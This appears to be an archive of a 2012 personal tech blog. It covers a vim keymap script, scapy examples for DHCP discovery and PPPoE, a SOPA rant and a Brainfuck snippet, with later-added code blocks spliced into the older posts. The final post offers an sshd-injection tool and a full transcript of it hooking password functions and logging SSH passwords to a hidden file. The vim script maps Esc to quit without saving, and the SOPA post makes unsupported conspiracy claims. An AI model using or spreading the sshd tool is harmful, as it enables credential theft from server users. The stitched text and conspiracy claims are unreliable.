Tuesday, January 24, 2012

Easing vim use

The following is a vim script that makes it easier to use vim for those who are familiar with graphical editors:

" Esc quits without saving (like closing the window); <CR> runs the command
:map <Esc> :q!<CR>
" Ctrl-C copies the whole buffer to the X clipboard through xclip
:map <C-c> :w !xclip<CR>
" Ctrl-V pastes the X clipboard contents below the cursor
:map <C-v> :r !xclip -o<CR>
" Ctrl-W saves and quits
:map <C-w> :wq!<CR>
" Ctrl-Z undoes the last change
:map <C-z> :u<CR>


To use the above, save it to a file (say easyedit.vim in the home directory, ~/easyedit.vim) and source it from ~/.vimrc by adding the following line:

so ~/easyedit.vim


Then start vim: ctrl-c, ctrl-v, ctrl-z, ctrl-w and esc now behave the way they do in a graphical editor.

Monday, January 23, 2012

Making the blog better

After 1000s of accesses, I have got many inputs to improve this blog. One of them being that I must first make it good to read. I will start working on this from today onwards. Article by article, I will make them readable. I kind of like the hackish way of doing things and ended up writing comprehensive and concise information in my blog. My efforts will be more towards better readability from now onwards :)

BTW all of those who take time to visit my blog, a big thank you for visiting my blog. I hope I get more audience once I make improvements :)

Thursday, January 19, 2012

DHCP discovery using scapy

Taken from here

Putting it plain and simple:

The following script sends a network packet containing the following layers:

a. DHCP: Application layer packet, message-type=discover
b. BOOTP: chaddr (the client hardware address) is used both as the destination hardware address for BOOTP reply messages and as the client identifier; it is set to the MAC address of the NIC
c. UDP: destination port is 67
d. IP: destination IP is broadcast IP address 255.255.255.255
e. ETHERNET: destination MAC is broadcast MAC ff:ff:ff:ff:ff:ff

from scapy.all import *
import threading

# The offer comes back addressed to the client, not to the 0.0.0.0 source
# we send from, so tell scapy not to drop replies on that basis.
conf.checkIPaddr = False

#
# Get the hardware address of the NIC card; it goes into the BOOTP chaddr field
#
fam, hw = get_if_raw_hwaddr(conf.iface)

#
# The DHCP discover: broadcast at layer 2 and layer 3, client port 68 to server port 67
#
discover = (Ether(dst="ff:ff:ff:ff:ff:ff")
            / IP(src="0.0.0.0", dst="255.255.255.255")
            / UDP(sport=68, dport=67)
            / BOOTP(chaddr=hw)
            / DHCP(options=[("message-type", "discover"), "end"]))


def dhcp_discover(resp):
    print("Source: " + resp[Ether].src)
    print("Dest: " + resp[Ether].dst)

    #
    # What if there is no DHCP component in the incoming packet
    # (so try and except): skip it instead of crashing the sniffer
    #
    try:
        options = resp[DHCP].options
    except IndexError:
        return
    for opt in options:
        if opt == "end":
            break        # nothing meaningful follows the end marker
        elif opt == "pad":
            continue     # padding can appear between real options, so keep going
        print(opt)       # each option is a (name, value) tuple


#
# Send the raw packet to the network once the sniffer is listening
# (a short timer so sniff() below is already running when the offer arrives)
#
threading.Timer(1.0, sendp, args=(discover,),
                kwargs={"count": 3, "verbose": False}).start()

#
# Sniff on udp port 67 and 68 for ten seconds
# and run the function dhcp_discover on all packets sniffed
#
sniff(filter="udp and (port 67 or 68)",
      prn=dhcp_discover, store=0, timeout=10)


The following is the response from the DHCP server when the above script is executed:

# python dhcp.py
Source: 00:1c:f9:93:04:00
Dest: 00:50:56:7c:c3:4f
('message-type', 5)
('server_id', '10.112.11.12')
('lease_time', 1800)
('subnet_mask', '255.255.252.0')
('router', '10.112.75.253')
('domain', 'dhcpserver.com')
('name_server', '10.112.11.12')
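As an added example (not part of the original post or of scapy), here is a pure-Python decoder for the raw DHCP option bytes that scapy turns into the (name, value) tuples printed above, with the same end and pad handling the callback performs plus a length check; the sample bytes are constructed to reproduce the offer shown in the output.

```python
import socket
import struct

# Option codes (RFC 2132) for the options the server answered with above
OPTION_NAMES = {1: "subnet_mask", 3: "router", 6: "name_server", 15: "domain",
                51: "lease_time", 53: "message-type", 54: "server_id"}
IP_OPTIONS = {1, 3, 6, 54}   # values are one or more IPv4 addresses

def decode_dhcp_options(raw):
    """Decode the DHCP option bytes that follow the magic cookie into
    (name, value) tuples in wire order. 255 ('end') stops the scan; 0 ('pad')
    is a single filler byte with no length and is skipped, not treated as a
    terminator. Truncated options raise instead of being read past the end."""
    opts, i = [], 0
    while i < len(raw):
        code = raw[i]
        if code == 255:
            break
        if code == 0:
            i += 1
            continue
        if i + 1 >= len(raw):
            raise ValueError("truncated option header at offset %d" % i)
        length = raw[i + 1]
        value = raw[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("option %d claims %d bytes, got %d" % (code, length, len(value)))
        name = OPTION_NAMES.get(code, "option_%d" % code)
        if code in IP_OPTIONS and length and length % 4 == 0:
            addrs = [socket.inet_ntoa(value[j:j + 4]) for j in range(0, length, 4)]
            decoded = addrs[0] if len(addrs) == 1 else addrs
        elif code == 51 and length == 4:     # lease time: 32-bit big-endian seconds
            decoded = struct.unpack("!I", value)[0]
        elif code == 53:                     # message type: one byte (5 = OFFER)
            decoded = value[0]
        else:                                # text options such as the domain name
            decoded = value.decode("ascii", "replace")
        opts.append((name, decoded))
        i += 2 + length
    return opts

# Constructed sample: the option bytes behind the OFFER printed above, with a
# pad byte inserted before name_server and a trailing end marker.
SAMPLE_OFFER_OPTIONS = (
    bytes([53, 1, 5]) + bytes([54, 4]) + socket.inet_aton("10.112.11.12")
    + bytes([51, 4]) + struct.pack("!I", 1800)
    + bytes([1, 4]) + socket.inet_aton("255.255.252.0")
    + bytes([3, 4]) + socket.inet_aton("10.112.75.253")
    + bytes([15, 14]) + b"dhcpserver.com" + b"\x00"
    + bytes([6, 4]) + socket.inet_aton("10.112.11.12") + b"\xff")
```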

PPPoE using scapy

Article taken from here (directly reproduced below):

Publication date : February 1999
RFC Author(s) : R.Wheeler, D.Simone, D. Carrel, J. Evarts, K. Lidl, L. Mamakos
Category : informational

The Point-to-point Protocol (PPP) provides a standard method for transporting multi-protocol datagrams over point-to-point links.

PPPoE has two different stages. The first one is the PPP Discovery stage, which contains four steps in which a host discovers the MAC address of the peer (Concentrator) and the PPPoE session ID.
In fact, the MAC address and PPPoE_SESSION_ID uniquely define a session.
The relationship between the peers is a simple client/server one, where a client asks the server (Concentrator) for the information needed to establish the session.

The frame sent is a simple Ethernet frame where the ETHER_TYPE is set to either 0x8863 (Discovery Stage) or 0x8864 (PPP Session Stage).

Here is the Ethernet Payload for PPPoE:
[ VER:4 | TYPE:4 | CODE:8 | SESSION_ID:16 | LENGTH:16 | PAYLOAD:16 ]

Discovery Stage: Ethernet frames have the ETHER_TYPE field set to 0x8863

1. Client to server: Initiation (PPPoE Active Discovery Initiation)
PADI:
* Host sends a broadcast packet, with the code field set to 0x09
* The session id is set to 0x0000

2. Server to client: Offer (PPPoE Active Discovery Offer)
PADO:
* Access Concentrator replies to a unicast address, with code set to 0x07
* The session id is set to 0x0000
* PADO packet contains AC-Name TAG, Service-Name TAG

3. Client to server: Request (PPPoE Active Discovery Request)
PADR:
* Host receives one or more PADO packets and has to choose one
* Choice is based on AC-Name or Services offered
* Host sends one PADR packet to the Concentrator
* Destination is the unicast Ethernet address of the Concentrator
* code field is set to 0x19 and session id is set to 0x0000

4. Server to client: Session-confirmation (PPPoE Active Discovery Session-confirmation)
PADS:
* When the Access Concentrator receives a PADR it prepares to begin the PPP session
* generates a unique session id
* replies to a unicast Ethernet address
* code field is set to 0x65
* contains exactly one TAG of TAG_TYPE Service-Name

5. Either end to other end: Termination (PADT)
* packet sent by host or Access Concentrator
* session is established
* Destination address is unicast
* session is the SESSION_ID generated
* code field is set to 0xa7

Examples using scapy:
1. PADI:
sendp(Ether(type=0x8863,src="00:60:4c:72:e7:69",dst="ff:ff:ff:ff:ff:ff")/PPPoED(code=0x09,sessionid=0x0000),iface="nas0")

2. PADO:
sendp(Ether(type=0x8863,src="00:bf:12:fa:90:fd",dst="00:60:4c:72:e7:69")/PPPoED(code=0x07,sessionid=0x0000),iface="nas0")
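As an added example (not part of the reproduced article or of scapy), here is a plain-Python builder and parser for the discovery payload laid out above, [VER:4|TYPE:4|CODE:8|SESSION_ID:16|LENGTH:16|tags], using the code values from the five steps; the TAG_TYPE numbers for Service-Name and AC-Name are taken from RFC 2516 and the PADI/PADO/PADS exchange is constructed.

```python
import struct

# Code values for the five discovery packets described above
PADI, PADO, PADR, PADS, PADT = 0x09, 0x07, 0x19, 0x65, 0xa7
# TAG_TYPE numbers from RFC 2516 for the two tags the text names
TAG_SERVICE_NAME, TAG_AC_NAME = 0x0101, 0x0102

def build_discovery(code, session_id, tags):
    """Build the payload [VER:4|TYPE:4|CODE:8|SESSION_ID:16|LENGTH:16|tags] with
    VER and TYPE both 1; each tag is TAG_TYPE:16, TAG_LENGTH:16, TAG_VALUE."""
    body = b"".join(struct.pack("!HH", t, len(v)) + v for t, v in tags)
    return struct.pack("!BBHH", 0x11, code, session_id, len(body)) + body

def parse_discovery(payload):
    """Parse a discovery payload into (code, session_id, [(tag_type, value), ...]).
    LENGTH and every TAG_LENGTH are checked against the bytes actually present,
    so a frame that promises more than it carries is rejected, not over-read."""
    if len(payload) < 6:
        raise ValueError("payload shorter than the 6-byte PPPoE header")
    vt, code, session_id, length = struct.unpack("!BBHH", payload[:6])
    if vt != 0x11:
        raise ValueError("unsupported VER/TYPE 0x%02x" % vt)
    if length > len(payload) - 6:
        raise ValueError("LENGTH %d exceeds the %d bytes present" % (length, len(payload) - 6))
    tags, i, end = [], 6, 6 + length
    while i < end:
        if i + 4 > end:
            raise ValueError("truncated tag header at offset %d" % i)
        tag_type, tag_len = struct.unpack("!HH", payload[i:i + 4])
        if i + 4 + tag_len > end:
            raise ValueError("tag 0x%04x overruns LENGTH" % tag_type)
        tags.append((tag_type, payload[i + 4:i + 4 + tag_len]))
        i += 4 + tag_len
    return code, session_id, tags

# Constructed exchange for steps 1, 2 and 4 above: the host broadcasts a PADI
# for any service, the concentrator "ac1" answers with a PADO, and after the
# PADR it confirms with a PADS carrying the session id it generated (0x0001).
PADI_FRAME = build_discovery(PADI, 0x0000, [(TAG_SERVICE_NAME, b"")])
PADO_FRAME = build_discovery(PADO, 0x0000, [(TAG_AC_NAME, b"ac1"), (TAG_SERVICE_NAME, b"")])
PADS_FRAME = build_discovery(PADS, 0x0001, [(TAG_SERVICE_NAME, b"")])
```

These payloads go after an Ethernet header with type 0x8863, exactly where the scapy examples above put the PPPoED layer.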

Tuesday, January 17, 2012

SOPA and PIPA

All that had to be known about the conspiratorial nature of the events happening nowadays should have been known by almost all people by now. Except for remotely existing communities of people or tribes (who live without the support of the global conspirators, and don't really care about them), all others in civilised societies should have known enough through the internet by now. For all those in those societies that still need to be educated, it will require something more than just the internet to educate them. So suppressing internet freedom, though a really bad step, doesn't really create much of a problem.

For all the honest efforts put by enlightened people around the world to explain the nature of what is happening around us, A BIG THANK YOU

For all those who have been sitting at the top, making such legislation, a sincere advice: Have some common sense and don't suppress internet freedom; Remember, today you are powerful people and nothing is permanent except GOD

Just wrote my name in BF programming language

++++++++++[>++++++++>+++++++++++>+++++++++>++++++++++>++++++++++>+++++++++++>++++++++++>+++++++++++>+++++++++>+++>++++++>++++++++++>+++++++++>+++++++++++>++++++++++>+++++++++++>+++++++++>++++++++++>+++++++++>+++++++++++<<<<<<<<<<<<<<<<<<<<-]>+++.>+++++++.>+++++++++.>++++.>+++++.>.>.>++++.>+++++++.>++.>+++++++.>++++.>+++++++.>.>.>++++.>+++++++.>++++.>+++++++.>+++++.>+++++++.>.>.>++++.>+++++++.>+++++++.>++++.>+++++++.

Friday, January 13, 2012

SSH F***er (can't do anything, this is the name given by author)

Here is a utility that captures ssh login passwords at runtime, by injecting a hooking library into the running sshd as the transcript below shows:

Here is the gz

And below is an example:

root@:/tmp> tar zxvf sshf.tgz
sshf/
sshf/sshf.c
sshf/evilsshd.c
sshf/Makefile.in
sshf/config.h.in
sshf/configure
root@:/tmp> cd sshf
root@:/tmp/sshf> ./configure ; make
checking for gcc... gcc
checking for C compiler default output... a.out
checking whether the C compiler works... yes
checking whether we are cross compiling... no
checking for executable suffix...
checking for object suffix... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for pam_start in -lpam... yes
checking for MD5_Update in -lcrypto... yes
configure: creating ./config.status
config.status: creating Makefile
config.status: creating config.h
gcc -w -fPIC -shared -o evilsshd.so evilsshd.c -lcrypt -lcrypto -lpam -DHAVE_CONFIG_H
gcc -w -o sshf sshf.c
root@:/tmp/sshf> ps auwx | grep sshd
root      9597  0.0  0.3  2840 1312 ?        S    03:04   0:00 sshd
root@:/tmp/sshf>
root@:/tmp/sshf> ./sshf 9597 /tmp/sshf/evilsshd.so
attached to pid 9597
_dl_open at 0x4023014c
stopped 9597 at 0x402017ee
jam! if it jams here, try to telnet into sshd port or smthing
lib injection done!
org crypt() at 0x804b860, evil crypt at 0x40265d60
org getspnam at 0x804afa0, evil getspnam at 0x40265e0c
org strncmp() at 0x804b8f0, evil strncmp() at 0x40265a84
org MD5_Update() at 0x804bdf0, evil MD5Update at 0x40265aec
all done, now quiting...
root@:/tmp/sshf>
root@:/tmp/sshf> ssh -l luser 127.0.0.1
luser@127.0.0.1's password:
[luser@localhost:~>ls -al /tmp/.sshd_passwordz
-rw-r--r--    1 root     root          104 Jul 14 03:27 /tmp/.sshd_passwordz
[luser@localhost:~>exit